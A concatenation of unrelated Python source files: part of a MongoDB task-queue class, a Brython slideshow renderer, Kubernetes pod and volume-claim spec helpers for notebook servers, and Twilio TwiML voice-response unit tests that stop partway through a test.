    def queue_delete(
        self,
        queue_name,
    ):
        """Drop every item of *queue_name*; return how many were deleted."""
        result = self.connection.tasker.task_queue.delete_many(
            filter={
                'queue_name': queue_name,
            },
        )
        return result.deleted_count

    def __getstate__(
        self,
    ):
        """Pickle support: only the URI is serialized, not the live client."""
        return {
            'mongodb_uri': self.mongodb_uri,
        }

    def __setstate__(
        self,
        value,
    ):
        """Pickle support: re-run __init__ to rebuild the client connection."""
        self.__init__(
            mongodb_uri=value['mongodb_uri'],
        )
| |
from browser import document, html, window
import markdown
import highlight
def escape(html):
    """Return *html* with the XML special characters '<' and '>' escaped.

    Used on the non-Python lines of console examples so that literal
    angle brackets survive insertion into an element's ``html`` property.

    Fix: the original body replaced '<' with '<' and '"' with '"' —
    no-ops left by a bad HTML-entity transcription of '&lt;'/'&gt;'.
    """
    html = html.replace('<', '&lt;')
    html = html.replace('>', '&gt;')
    return html
def _keydown(ev, path, zone, page):
    """Legacy arrow-key handler: reload the show at *path* on the
    next/previous page."""
    forward_keys = (39, 40)   # right / down arrows
    backward_keys = (37, 38)  # left / up arrows
    if ev.keyCode in forward_keys:
        show(path, zone, page + 1)
        ev.preventDefault()
    elif ev.keyCode in backward_keys:
        show(path, zone, page - 1)
        ev.preventDefault()
def keydown(ev, slideshow, zone):
    """Arrow-key navigation: advance or rewind *slideshow*, wrapping at
    both ends, then redraw the current page in *zone*."""
    key = ev.keyCode
    if key in (39, 40):      # right or down arrow: next page
        step = 1
    elif key in (37, 38):    # left or up arrow: previous page
        step = -1
    else:
        return
    slideshow.page_num += step
    # wrap around past either end of the deck
    if slideshow.page_num >= len(slideshow.pages):
        slideshow.page_num = 0
    elif slideshow.page_num < 0:
        slideshow.page_num = len(slideshow.pages) - 1
    show_page(slideshow, zone, slideshow.page_num)
    ev.preventDefault()
def move_to(ev, slideshow, zone):
    """Timeline click handler: jump to the page proportional to the
    horizontal click position inside the timeline element."""
    # fraction of the timeline width where the user clicked (0.0 .. 1.0)
    pc = (ev.x - ev.target.abs_left) / ev.target.width
    nb_pages = len(slideshow.pages) - 1
    page = round(nb_pages * pc)
    slideshow.page_num = page
    # centre the cursor element on the click position
    new_pos = '%spx' %(ev.x -ev.target.abs_left -
                       (document['tl_pos'].width / 2))
    # show page at specified position
    show_page(slideshow, zone, page)
    # set new cursor position
    document['tl_pos'].style.left = new_pos
def click_on_tl_pos(ev):
    """Swallow clicks on the timeline cursor itself."""
    # don't move if user clicks on current timeline position
    ev.stopPropagation()
class Slideshow:
    """Parsed slideshow document.

    Loads the markdown-ish source at *path* (with a cache-busting query
    string), consumes leading @title/@pagenum/@index directives, then
    splits the body into pages on '../..' separators and '@pause' marks.
    """
    def __init__(self, path):
        # cache-buster so the browser always refetches the source
        qs = window.Date.new().getTime()
        self.src = src = open(path+'?foo=%s' %qs).read()
        self.title = ''
        self.show_page_num = False
        # table of contents : matches matter with page number
        self.contents = []
        # directives for the document
        while src.startswith('@'):
            line_end = src.find('\n')
            key,value = src[:line_end].split(' ', 1)
            if key=='@title':
                self.title = value
            elif key=='@pagenum':
                self.show_page_num = True
            elif key=="@index":
                # header-level index entries always point at page 0
                self.contents.append([value, 0])
            src = src[line_end + 1:]
        self.pages = []
        lines = []
        for line in src.split('\n'):
            if line.startswith('../..'):
                # hard page break: flush accumulated lines as one page
                self.pages.append('\n'.join(lines))
                lines = []
            elif line.startswith('@pause'):
                # soft break: emit the page so far but keep accumulating,
                # so the next page repeats this content plus what follows
                self.pages.append('\n'.join(lines))
            elif line.startswith('@index'):
                # in-body index entry points at the upcoming page
                self.contents.append([line.split(' ', 1)[1], len(self.pages)])
            else:
                lines.append(line)
        if lines:
            # trailing content after the last separator forms the final page
            self.pages.append('\n'.join(lines))
def show(path, zone, page_num=None):
    """Load the slideshow at *path* and display one page in *zone*.

    When *page_num* is None the last viewed page is restored from the
    'page' cookie; the resulting number is clamped to the valid range.
    Rebinds the document-level keydown handler for arrow navigation.
    """
    slideshow = Slideshow(path)
    if page_num is None:
        page_num = 0
        # check if page num was stored in a cookie
        cookies = document.cookie
        if cookies:
            # parse "k1=v1; k2=v2" into a dict (each split('=') pair
            # becomes one entry; a malformed cookie raises ValueError)
            elts = dict([x.strip() for x in cookie.split('=')]
                for cookie in cookies.split(";"))
            if "page" in elts:
                page_num = int(elts["page"])
    # clamp to the deck's bounds
    if page_num < 0:
        page_num = 0
    elif page_num >= len(slideshow.pages):
        page_num = len(slideshow.pages) - 1
    slideshow.page_num = page_num
    # replace any previous keyboard handler with one bound to this show
    document.unbind('keydown')
    document.bind('keydown',lambda ev:keydown(ev, slideshow, zone))
    show_page(slideshow, zone, page_num)
def run_code(ev):
    """Click handler for highlighted code blocks.

    Currently just prints the element's text; presumably a placeholder
    for real execution — TODO confirm intended behaviour.
    """
    print(ev.target.text)
def show_page(slideshow, zone, page_num):
    """Render page *page_num* of *slideshow* into *zone*.

    Builds the page body from markdown, an optional table-of-contents
    selector, a footer (title / page counter) and a clickable timeline,
    then syntax-highlights any .python / .python-console code blocks.
    Also persists the page number in a cookie.
    """
    # if table of contents is not empty, add it
    if slideshow.contents:
        toc = html.SELECT(name="toc")
        toc.bind('change', lambda ev: show_page(slideshow, zone,
            int(ev.target.options[ev.target.selectedIndex].value)))
        for content in slideshow.contents:
            # preselect the last entry at or before the current page
            toc <= html.OPTION(content[0], value=content[1],
                selected=page_num>=content[1])
    slideshow.page_num = int(page_num)
    # store page num in a cookie
    document.cookie = "page={}".format(page_num)
    zone.clear()
    body = html.DIV()
    body.html = markdown.mark(slideshow.pages[page_num])[0]
    wh = window.innerHeight
    # scale the font with the window height (18px at a 800px-tall window)
    fontSize = int(18 * window.innerHeight / 800)
    body.style.fontSize = "{}px".format(fontSize)
    if slideshow.contents:
        # wrap so the TOC selector sits above the page body
        body = html.DIV(toc + body)
    footer = html.DIV(Id="footer")
    footer.style.fontSize = "{}px".format(fontSize)
    if slideshow.title:
        footer <= html.DIV(slideshow.title,style=dict(display='inline'))
    if slideshow.show_page_num:
        footer <= html.SPAN(' (%s/%s)' %(page_num+1, len(slideshow.pages)),
            style=dict(display='inline'))
    timeline = html.DIV(Id='timeline')
    timeline.style.height = "{}px".format(int(fontSize/2))
    tl_pos = html.DIV(Id='tl_pos')
    timeline <= tl_pos
    timeline.bind('click', lambda ev:move_to(ev, slideshow, zone))
    tl_pos.bind('click', click_on_tl_pos)
    zone <= body + footer + timeline
    wh = window.innerHeight
    # place the timeline cursor proportionally to the current page
    tl_pos.style.left = '%spx' %(timeline.width*page_num/len(slideshow.pages))
    document["cours"].style.minHeight = "{}px".format(int(wh * 0.9))
    # syntax-highlight plain Python code blocks
    for elt in zone.get(selector='.python'):
        src = elt.text.strip()
        width = max(len(line) for line in src.split('\n'))
        width = max(width, 30)
        # replace element content by highlighted code
        elt.html = highlight.highlight(src).html
        elt.style.width = '%sem' %int(0.7*width)
        elt.bind('click', run_code)
    # highlight interactive-console transcripts: '>>>'/'...' lines are
    # Python source (highlighted as one unit), other lines are output
    for elt in zone.get(selector='.python-console'):
        src = elt.text.strip()
        lines = src.split('\n')
        result = ''
        py = ''
        py_starts = []
        for line in lines:
            if line.startswith('>>>') or line.startswith('...'):
                # accumulate source; remember each prompt for re-insertion
                py += line[4:]+'\n'
                py_starts.append('<span class="python-prompt">{}</span>'.format(line[:3]))
            else:
                if py:
                    # flush pending source, re-attaching the saved prompts
                    # NOTE(review): this branch does not append the current
                    # output line itself — an output line immediately after
                    # code appears to be dropped; confirm intended.
                    colored = highlight.highlight(py).html
                    colored_lines = colored.split('\n')
                    if result:
                        result += '\n'
                    result += '\n'.join(start+' '+line
                        for (start, line) in zip(py_starts, colored_lines))
                    py = ''
                    py_starts = []
                else:
                    line = escape(line)
                    result += '\n' + line
        if py:
            # flush any source left at the end of the transcript
            colored = highlight.highlight(py).html
            colored_lines = colored.split('\n')
            if result:
                result += '\n'
            result += '\n'.join(start+' '+line
                for (start, line) in zip(py_starts, colored_lines))
            py = ''
            py_starts = []
        elt.html = result
| |
"""
Helper methods for generating k8s API objects.
"""
from kubernetes.client.models.v1_pod import V1Pod
from kubernetes.client.models.v1_pod_spec import V1PodSpec
from kubernetes.client.models.v1_object_meta import V1ObjectMeta
from kubernetes.client.models.v1_pod_security_context import V1PodSecurityContext
from kubernetes.client.models.v1_local_object_reference import V1LocalObjectReference
from kubernetes.client.models.v1_volume import V1Volume
from kubernetes.client.models.v1_volume_mount import V1VolumeMount
from kubernetes.client.models.v1_container import V1Container
from kubernetes.client.models.v1_security_context import V1SecurityContext
from kubernetes.client.models.v1_container_port import V1ContainerPort
from kubernetes.client.models.v1_env_var import V1EnvVar
from kubernetes.client.models.v1_resource_requirements import V1ResourceRequirements
from kubernetes.client.models.v1_persistent_volume_claim import V1PersistentVolumeClaim
from kubernetes.client.models.v1_persistent_volume_claim_spec import V1PersistentVolumeClaimSpec
def make_pod(
    name,
    image_spec,
    image_pull_policy,
    image_pull_secret,
    port,
    cmd,
    node_selector,
    run_as_uid,
    fs_gid,
    run_privileged,
    env,
    working_dir,
    volumes,
    volume_mounts,
    labels,
    cpu_limit,
    cpu_guarantee,
    mem_limit,
    mem_guarantee,
    lifecycle_hooks,
    init_containers,
    service_account,
):
    """
    Make a k8s pod specification for running a user notebook.

    Fix: the service account name is now set on ``pod.spec`` — the
    original assigned ``pod.service_account_name``, which is not a field
    of V1Pod (serviceAccountName lives on the PodSpec), so the setting
    was silently dropped at serialization.

    Parameters:
      - name:
        Name of pod. Must be unique within the namespace the object is
        going to be created in. Must be a valid DNS label.
      - image_spec:
        Image specification - usually a image name and tag in the form
        of image_name:tag. Same thing you would use with docker commandline
        arguments
      - image_pull_policy:
        Image pull policy - one of 'Always', 'IfNotPresent' or 'Never'. Decides
        when kubernetes will check for a newer version of image and pull it when
        running a pod.
      - image_pull_secret:
        Image pull secret - Default is None -- set to your secret name to pull
        from private docker registry.
      - port:
        Port the notebook server is going to be listening on
      - cmd:
        The command used to execute the singleuser server.
      - node_selector:
        Dictionary Selector to match nodes where to launch the Pods
      - run_as_uid:
        The UID used to run single-user pods. The default is to run as the user
        specified in the Dockerfile, if this is set to None.
      - fs_gid
        The gid that will own any fresh volumes mounted into this pod, if using
        volume types that support this (such as GCE). This should be a group that
        the uid the process is running as should be a member of, so that it can
        read / write to the volumes mounted.
      - run_privileged:
        Whether the container should be run in privileged mode.
      - env:
        Dictionary of environment variables.
      - working_dir:
        String specifying the working directory for the notebook container
      - volumes:
        List of dictionaries containing the volumes of various types this pod
        will be using. See k8s documentation about volumes on how to specify
        these
      - volume_mounts:
        List of dictionaries mapping paths in the container and the volume(
        specified in volumes) that should be mounted on them. See the k8s
        documentation for more details
      - labels:
        Labels to add to the spawned pod.
      - cpu_limit:
        Float specifying the max number of CPU cores the user's pod is
        allowed to use.
      - cpu_guarantee:
        Float specifying the max number of CPU cores the user's pod is
        guaranteed to have access to, by the scheduler.
      - mem_limit:
        String specifying the max amount of RAM the user's pod is allowed
        to use. String instead of float/int since common suffixes are allowed
      - mem_guarantee:
        String specifying the max amount of RAM the user's pod is guaranteed
        to have access to. String instead of float/int since common suffixes
        are allowed
      - lifecycle_hooks:
        Dictionary of lifecycle hooks
      - init_containers:
        List of initialization containers belonging to the pod.
      - service_account:
        Service account to mount on the pod. None disables mounting
    """
    pod = V1Pod()
    pod.kind = "Pod"
    pod.api_version = "v1"
    pod.metadata = V1ObjectMeta()
    pod.metadata.name = name
    pod.metadata.labels = labels.copy()
    pod.spec = V1PodSpec()
    # Pod-level security context carries the fs group / run-as uid.
    security_context = V1PodSecurityContext()
    if fs_gid is not None:
        security_context.fs_group = int(fs_gid)
    if run_as_uid is not None:
        security_context.run_as_user = int(run_as_uid)
    pod.spec.security_context = security_context
    if image_pull_secret is not None:
        pod.spec.image_pull_secrets = []
        image_secret = V1LocalObjectReference()
        image_secret.name = image_pull_secret
        pod.spec.image_pull_secrets.append(image_secret)
    if node_selector:
        pod.spec.node_selector = node_selector
    pod.spec.containers = []
    notebook_container = V1Container()
    notebook_container.name = "notebook"
    notebook_container.image = image_spec
    notebook_container.working_dir = working_dir
    notebook_container.ports = []
    port_ = V1ContainerPort()
    port_.name = "notebook-port"
    port_.container_port = port
    notebook_container.ports.append(port_)
    notebook_container.env = [V1EnvVar(k, v) for k, v in env.items()]
    notebook_container.args = cmd
    notebook_container.image_pull_policy = image_pull_policy
    notebook_container.lifecycle = lifecycle_hooks
    notebook_container.resources = V1ResourceRequirements()
    if service_account is None:
        # Add a hack to ensure that no service accounts are mounted in spawned pods
        # This makes sure that we don"t accidentally give access to the whole
        # kubernetes API to the users in the spawned pods.
        # Note: We don't simply use `automountServiceAccountToken` here since we wanna be compatible
        # with older kubernetes versions too for now.
        hack_volume = V1Volume()
        hack_volume.name = "no-api-access-please"
        hack_volume.empty_dir = {}
        hack_volumes = [hack_volume]

        hack_volume_mount = V1VolumeMount()
        hack_volume_mount.name = "no-api-access-please"
        hack_volume_mount.mount_path = "/var/run/secrets/kubernetes.io/serviceaccount"
        hack_volume_mount.read_only = True
        hack_volume_mounts = [hack_volume_mount]
    else:
        hack_volumes = []
        hack_volume_mounts = []
        # serviceAccountName is a PodSpec field, not a Pod field.
        pod.spec.service_account_name = service_account

    if run_privileged:
        container_security_context = V1SecurityContext()
        container_security_context.privileged = True
        notebook_container.security_context = container_security_context

    notebook_container.resources.requests = {}
    if cpu_guarantee:
        notebook_container.resources.requests['cpu'] = cpu_guarantee
    if mem_guarantee:
        notebook_container.resources.requests['memory'] = mem_guarantee
    notebook_container.resources.limits = {}
    if cpu_limit:
        notebook_container.resources.limits['cpu'] = cpu_limit
    if mem_limit:
        notebook_container.resources.limits['memory'] = mem_limit
    notebook_container.volume_mounts = volume_mounts + hack_volume_mounts
    pod.spec.containers.append(notebook_container)
    pod.spec.init_containers = init_containers
    pod.spec.volumes = volumes + hack_volumes
    return pod
def make_pvc(
    name,
    storage_class,
    access_modes,
    storage,
    labels
):
    """
    Make a k8s pvc specification for running a user notebook.
    Parameters:
      - name:
        Name of persistent volume claim. Must be unique within the namespace the object is
        going to be created in. Must be a valid DNS label.
      - storage_class
        String of the name of the k8s Storage Class to use. Falsy values skip
        the storage-class annotation entirely.
      - access_modes:
        A list of specifying what access mode the pod should have towards the pvc
      - storage
        The amount of storage needed for the pvc
      - labels
        Dictionary of labels to merge into the claim's metadata labels.
    """
    pvc = V1PersistentVolumeClaim()
    pvc.kind = "PersistentVolumeClaim"
    pvc.api_version = "v1"
    pvc.metadata = V1ObjectMeta()
    pvc.metadata.name = name
    pvc.metadata.annotations = {}
    if storage_class:
        # beta annotation kept for compatibility with older clusters
        pvc.metadata.annotations.update({"volume.beta.kubernetes.io/storage-class": storage_class})
    pvc.metadata.labels = {}
    pvc.metadata.labels.update(labels)
    pvc.spec = V1PersistentVolumeClaimSpec()
    pvc.spec.access_modes = access_modes
    pvc.spec.resources = V1ResourceRequirements()
    pvc.spec.resources.requests = {"storage": storage}
    return pvc
| |
# -*- coding: utf-8 -*-
from tests.unit.twiml import TwilioTest
from twilio.twiml.voice_response import VoiceResponse, Dial, Enqueue, Gather
class TestResponse(TwilioTest):
    """TwiML generation tests for the top-level <Response> document."""
    def test_empty_response(self):
        """ should render a bare <Response /> """
        r = VoiceResponse()
        assert (self.strip(r) == '<?xml version="1.0" encoding="UTF-8"?><Response />')
    def test_response(self):
        """ should nest Hangup, Leave and Sms verbs in order """
        r = VoiceResponse()
        r.hangup()
        r.leave()
        r.sms(
            'twilio sms',
            to='+11234567890',
            from_='+10987654321'
        )
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Hangup /><Leave />' \
            '<Sms from="+10987654321" to="+11234567890">twilio sms</Sms></Response>'
    def test_response_chain(self):
        """ should produce the same document when used as a context manager """
        with VoiceResponse() as r:
            r.hangup()
            r.leave()
            r.sms(
                'twilio sms',
                to='+11234567890',
                from_='+10987654321'
            )
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Hangup /><Leave />' \
            '<Sms from="+10987654321" to="+11234567890">twilio sms</Sms></Response>'
    def test_nested_verbs(self):
        """ should nest a Say inside a Gather via nested context managers """
        with VoiceResponse() as r:
            with r.gather() as g:
                g.say('Hello', voice='man')
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Gather><Say voice="man">Hello</Say></Gather></Response>'
class TestSay(TwilioTest):
    """TwiML generation tests for the <Say> verb."""
    def test_empty_say(self):
        """ should be a say with no text """
        r = VoiceResponse()
        r.say('')
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Say /></Response>'
    def test_say_hello_world(self):
        """ should say hello world """
        r = VoiceResponse()
        r.say('Hello World')
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Say>Hello World</Say></Response>'
    def test_say_french(self):
        """ should render accented characters in the Say body """
        r = VoiceResponse()
        r.say('n\xe9cessaire et d\'autres')
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Say>nécessaire et d\'autres</Say></Response>'
    def test_say_loop(self):
        """ should say hello monkey and loop 3 times """
        r = VoiceResponse()
        r.say('Hello Monkey', loop=3)
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Say loop="3">Hello Monkey</Say></Response>'
    def test_say_loop_gb(self):
        """ should say hello monkey with the en-gb language attribute """
        r = VoiceResponse()
        r.say('Hello Monkey', language='en-gb')
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Say language="en-gb">Hello Monkey</Say></Response>'
    def test_say_loop_woman(self):
        """ should say have a woman say hello monkey and loop 3 times """
        r = VoiceResponse()
        r.say('Hello Monkey', loop=3, voice='woman')
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Say loop="3" voice="woman">Hello Monkey</Say></Response>'
    def test_say_all(self):
        """ convenience method: should say have a woman say hello monkey and loop 3 times and be in french """
        r = VoiceResponse()
        r.say('Hello Monkey', loop=3, voice='man', language='fr')
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Say language="fr" loop="3" voice="man">' \
            'Hello Monkey</Say></Response>'
class TestPlay(TwilioTest):
    """TwiML generation tests for the <Play> verb."""
    def test_empty_play(self):
        """ should render an empty Play verb """
        r = VoiceResponse()
        r.play()
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Play /></Response>'
    def test_play_hello(self):
        """ should play a URL """
        r = VoiceResponse()
        r.play(url='http://hellomonkey.mp3')
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Play>http://hellomonkey.mp3</Play></Response>'
    def test_play_hello_loop(self):
        """ should play a URL with a loop attribute """
        r = VoiceResponse()
        r.play(url='http://hellomonkey.mp3', loop=3)
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Play loop="3">http://hellomonkey.mp3</Play></Response>'
    def test_play_digits(self):
        """ should play digits """
        r = VoiceResponse()
        r.play(digits='w123')
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Play digits="w123" /></Response>'
class TestRecord(TwilioTest):
    """TwiML generation tests for the <Record> verb."""
    def test_record_empty(self):
        """ should record """
        r = VoiceResponse()
        r.record()
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Record /></Response>'
    def test_record_action_method(self):
        """ should record with an action and a get method """
        r = VoiceResponse()
        r.record(action='example.com', method='GET')
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Record action="example.com" method="GET" /></Response>'
    def test_record_max_length_finish_timeout(self):
        """ should record with an maxLength, finishOnKey, and timeout """
        r = VoiceResponse()
        r.record(timeout=4, finish_on_key='#', max_length=30)
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Record finishOnKey="#" maxLength="30" timeout="4" /></Response>'
    def test_record_transcribe(self):
        """ should record with a transcribe and transcribeCallback """
        r = VoiceResponse()
        r.record(transcribe_callback='example.com')
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Record transcribeCallback="example.com" /></Response>'
class TestRedirect(TwilioTest):
    """TwiML generation tests for the <Redirect> verb."""
    def test_redirect_empty(self):
        """ should render an empty Redirect verb """
        r = VoiceResponse()
        r.redirect('')
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Redirect /></Response>'
    def test_redirect_method(self):
        """ should redirect with a method attribute """
        r = VoiceResponse()
        r.redirect('example.com', method='POST')
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Redirect method="POST">example.com</Redirect></Response>'
    def test_redirect_method_params(self):
        """ should XML-escape query parameters in the redirect URL """
        r = VoiceResponse()
        r.redirect('example.com?id=34&action=hey', method='POST')
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response>' \
            '<Redirect method="POST">example.com?id=34&amp;action=hey</Redirect></Response>'
class TestHangup(TwilioTest):
    """TwiML generation tests for the <Hangup> verb."""
    def test_hangup(self):
        """ convenience: should render a bare <Hangup /> """
        r = VoiceResponse()
        r.hangup()
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Hangup /></Response>'
class TestLeave(TwilioTest):
    """TwiML generation tests for the <Leave> verb."""
    def test_leave(self):
        """ convenience: should render a bare <Leave /> """
        r = VoiceResponse()
        r.leave()
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Leave /></Response>'
class TestReject(TwilioTest):
    """TwiML generation tests for the <Reject> verb."""
    def test_reject(self):
        """ should be a Reject with default reason """
        r = VoiceResponse()
        r.reject()
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Reject /></Response>'
class TestSms(TwilioTest):
    """TwiML generation tests for the <Sms> verb."""
    def test_empty(self):
        """ Test empty sms verb """
        r = VoiceResponse()
        r.sms('')
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Sms /></Response>'
    def test_body(self):
        """ Test hello world """
        r = VoiceResponse()
        r.sms('Hello, World')
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Sms>Hello, World</Sms></Response>'
    def test_to_from_action(self):
        """ Test the to, from, and status callback """
        r = VoiceResponse()
        r.sms('Hello, World', to=1231231234, from_=3453453456, status_callback='example.com?id=34&action=hey')
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response>' \
            '<Sms from="3453453456" statusCallback="example.com?id=34&amp;action=hey" to="1231231234">' \
            'Hello, World</Sms></Response>'
    def test_action_method(self):
        """ Test the action and method parameters on Sms """
        r = VoiceResponse()
        r.sms('Hello', method='POST', action='example.com?id=34&action=hey')
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response>' \
            '<Sms action="example.com?id=34&amp;action=hey" method="POST">Hello</Sms></Response>'
class TestConference(TwilioTest):
    """TwiML generation tests for <Conference> nouns nested in <Dial>."""
    def test_conference(self):
        """ should render a Conference with boolean attributes lower-cased """
        d = Dial()
        d.conference(
            'TestConferenceAttributes',
            beep=False,
            wait_url='',
            start_conference_on_enter=True,
            end_conference_on_exit=True
        )
        r = VoiceResponse()
        r.append(d)
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Dial>' \
            '<Conference beep="false" endConferenceOnExit="true" startConferenceOnEnter="true" waitUrl="">' \
            'TestConferenceAttributes</Conference></Dial></Response>'
    def test_muted_conference(self):
        """ should render the muted attribute alongside the others """
        d = Dial()
        d.conference(
            'TestConferenceMutedAttribute',
            beep=False,
            muted=True,
            wait_url='',
            start_conference_on_enter=True,
            end_conference_on_exit=True
        )
        r = VoiceResponse()
        r.append(d)
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Dial>' \
            '<Conference beep="false" endConferenceOnExit="true" muted="true" startConferenceOnEnter="true" waitUrl="">' \
            'TestConferenceMutedAttribute</Conference></Dial></Response>'
class TestQueue(TwilioTest):
    """TwiML generation tests for <Queue> nouns nested in <Dial>."""
    def test_queue(self):
        """ should render a Queue with url and method attributes """
        d = Dial()
        d.queue('TestQueueAttribute', url='', method='GET')
        r = VoiceResponse()
        r.append(d)
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Dial>' \
            '<Queue method="GET" url="">TestQueueAttribute</Queue></Dial></Response>'
class TestEcho(TwilioTest):
    """TwiML generation tests for the <Echo> verb."""
    def test_echo(self):
        """ should render a bare <Echo /> """
        r = VoiceResponse()
        r.echo()
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Echo /></Response>'
class TestEnqueue(TwilioTest):
    """TwiML generation tests for the <Enqueue> verb and nested <Task>."""
    def test_enqueue(self):
        """ should render Enqueue with action/method/waitUrl attributes """
        r = VoiceResponse()
        r.enqueue(
            'TestEnqueueAttribute',
            action='act',
            method='GET',
            wait_url='wait',
            wait_url_method='POST'
        )
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response>' \
            '<Enqueue action="act" method="GET" waitUrl="wait" waitUrlMethod="POST">TestEnqueueAttribute</Enqueue>' \
            '</Response>'
    def test_task_string(self):
        """ should embed a Task given as a JSON string verbatim """
        e = Enqueue(None, workflowSid='123123123')
        e.task('{"account_sid": "AC123123123"}')
        r = VoiceResponse()
        r.append(e)
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Enqueue workflowSid="123123123">' \
            '<Task>{"account_sid": "AC123123123"}</Task></Enqueue></Response>'
    def test_task_dict(self):
        """ should serialize a Task given as a dict to the same JSON """
        e = Enqueue(None, workflowSid='123123123')
        e.task({"account_sid": "AC123123123"})
        r = VoiceResponse()
        r.append(e)
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><Enqueue workflowSid="123123123">' \
            '<Task>{"account_sid": "AC123123123"}</Task></Enqueue></Response>'
class TestDial(TwilioTest):
    def test_dial(self):
        """should redirect the call"""
        response = VoiceResponse()
        response.dial("1231231234")
        expected = (
            '<?xml version="1.0" encoding="UTF-8"?><Response><Dial>1231231234</Dial></Response>'
        )
        assert self.strip(response) == expected

    def test_sim(self):
        """a <Sim> noun nested inside <Dial>"""
        dial = Dial()
        dial.sim('123123123')
        response = VoiceResponse()
        response.append(dial)
        expected = (
            '<?xml version="1.0" encoding="UTF-8"?><Response><Dial><Sim>123123123</Sim></Dial></Response>'
        )
        assert self.strip(response) == expected

    def test_sip(self):
        """should redirect the call"""
        dial = Dial()
        dial.sip('foo@example.com')
        response = VoiceResponse()
        response.append(dial)
        expected = (
            '<?xml version="1.0" encoding="UTF-8"?><Response><Dial><Sip>foo@example.com</Sip></Dial></Response>'
        )
        assert self.strip(response) == expected

    def test_sip_username_password(self):
        """should redirect the call"""
        dial = Dial()
        dial.sip('foo@example.com', username='foo', password='bar')
        response = VoiceResponse()
        response.append(dial)
        expected = (
            '<?xml version="1.0" encoding="UTF-8"?><Response><Dial>'
            '<Sip password="bar" username="foo">foo@example.com</Sip></Dial></Response>'
        )
        assert self.strip(response) == expected

    def test_add_number(self):
        """add a number to a dial"""
        dial = Dial()
        dial.number('1231231234')
        response = VoiceResponse()
        response.append(dial)
        expected = (
            '<?xml version="1.0" encoding="UTF-8"?><Response><Dial><Number>1231231234</Number></Dial></Response>'
        )
        assert self.strip(response) == expected

    def test_add_number_status_callback_event(self):
        """add a number to a dial with status callback events"""
        dial = Dial()
        dial.number('1231231234', status_callback='http://example.com', status_callback_event='initiated completed')
        response = VoiceResponse()
        response.append(dial)
        expected = (
            '<?xml version="1.0" encoding="UTF-8"?><Response><Dial>'
            '<Number statusCallback="http://example.com" statusCallbackEvent="initiated completed">1231231234</Number>'
            '</Dial></Response>'
        )
        assert self.strip(response) == expected

    def test_add_conference(self):
        """add a conference to a dial"""
        dial = Dial()
        dial.conference('My Room')
        response = VoiceResponse()
        response.append(dial)
        expected = (
            '<?xml version="1.0" encoding="UTF-8"?><Response><Dial><Conference>My Room</Conference></Dial></Response>'
        )
        assert self.strip(response) == expected

    def test_add_queue(self):
        """add a queue to a dial"""
        dial = Dial()
        dial.queue('The Cute Queue')
        response = VoiceResponse()
        response.append(dial)
        expected = (
            '<?xml version="1.0" encoding="UTF-8"?><Response><Dial><Queue>The Cute Queue</Queue></Dial></Response>'
        )
        assert self.strip(response) == expected

    def test_add_empty_client(self):
        """add an empty client to a dial"""
        dial = Dial()
        dial.client('')
        response = VoiceResponse()
        response.append(dial)
        expected = (
            '<?xml version="1.0" encoding="UTF-8"?><Response><Dial><Client /></Dial></Response>'
        )
        assert self.strip(response) == expected

    def test_add_client(self):
        """add a client to a dial"""
        dial = Dial()
        dial.client('alice')
        response = VoiceResponse()
        response.append(dial)
        expected = (
            '<?xml version="1.0" encoding="UTF-8"?><Response><Dial><Client>alice</Client></Dial></Response>'
        )
        assert self.strip(response) == expected
class TestGather(TwilioTest):
    def test_empty(self):
        """a gather with nothing inside"""
        response = VoiceResponse()
        response.gather()
        expected = '<?xml version="1.0" encoding="UTF-8"?><Response><Gather /></Response>'
        assert self.strip(response) == expected

    def test_gather_say(self):
        """a gather containing a single <Say>"""
        gather = Gather()
        gather.say('Hello')
        response = VoiceResponse()
        response.append(gather)
        expected = (
            '<?xml version="1.0" encoding="UTF-8"?><Response><Gather><Say>Hello</Say></Gather></Response>'
        )
        assert self.strip(response) == expected

    def test_nested_say_play_pause(self):
        """a gather with a say, play, and pause"""
        gather = Gather()
        gather.say('Hey')
        gather.play(url='hey.mp3')
        gather.pause()
